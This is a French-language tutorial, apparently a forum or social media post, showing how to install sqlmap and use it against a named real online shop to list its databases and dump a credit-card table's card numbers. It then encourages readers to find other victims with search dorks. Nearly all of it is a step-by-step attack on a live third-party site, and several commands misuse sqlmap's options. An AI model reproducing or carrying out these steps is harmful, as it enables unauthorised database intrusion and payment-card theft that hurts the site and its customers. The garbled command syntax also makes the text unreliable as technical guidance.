RENCONTRE DE SQLMAP

Sqlmap est un outil open source permettant d'identifier et d'exploiter une injection SQL sur des applications web. Outre la simple exploitation d'une injection SQL, il fournit également des fonctionnalités permettant la prise de contrôle de l'équipement hébergeant la base de données.

Pour commencé nous allons installé sqlmap via Lazymux (je crois qu'on l'avait déjà installé) donc ouvrez votre terminal puis tapez 

👉 ls

👉 cd Lazymux

👉 ls

👉 python2 lazymux.py

Donc ici on vas choisir le 11 pour installer sqlmap

Puis vous faite

👉 cd sqlmap

👉 ls

Ici vous faite python2 sqlmap.py

Tout le monde est là?

Voici un site de vente assez vulnérable 

 http://aceronline.net/product.php?cid=24

Donc pour pouvoir entrer dans sa base de donné on tape ceci

👉 python2 sqlmap.py --url http://aceronline.net/product.php?cid=24 --dbs

Arrivée ici vous appuyez  Y

Appuyer sur Y

Appuyer Y

Voici la base de donné du site

Ensuite faite 

👉 python2 sqlmap.py --url http://aceronline.net/product.php?cid=24 --dbs db261348674 --tables

Voici le résultat une fois arrivé là comme nous on veux que les cartes de crédit on vas choisir cc_credit

Pour entrer dedans faite

👉  python2 sqlmap.py --url http://aceronline.net/product.php?cid=24 --dbs db261348674 --tables cc_credit --columns

Mais c'est ça qui nous intéresse 👇👇

Faite

👉   python2 sqlmap.py --url http://aceronline.net/product.php?cid=24 --dbs db261348674 --tables cc_credit --columns CardNumber --dump

Si tout se passe bien vous devriez voir les numéro des cartes de crédit si vous voulez essayez sur d'autre site utilisé les dork

Voilà en vidéo

👉 https://m.youtube.com/watch?v=gMNIuXFUaNQ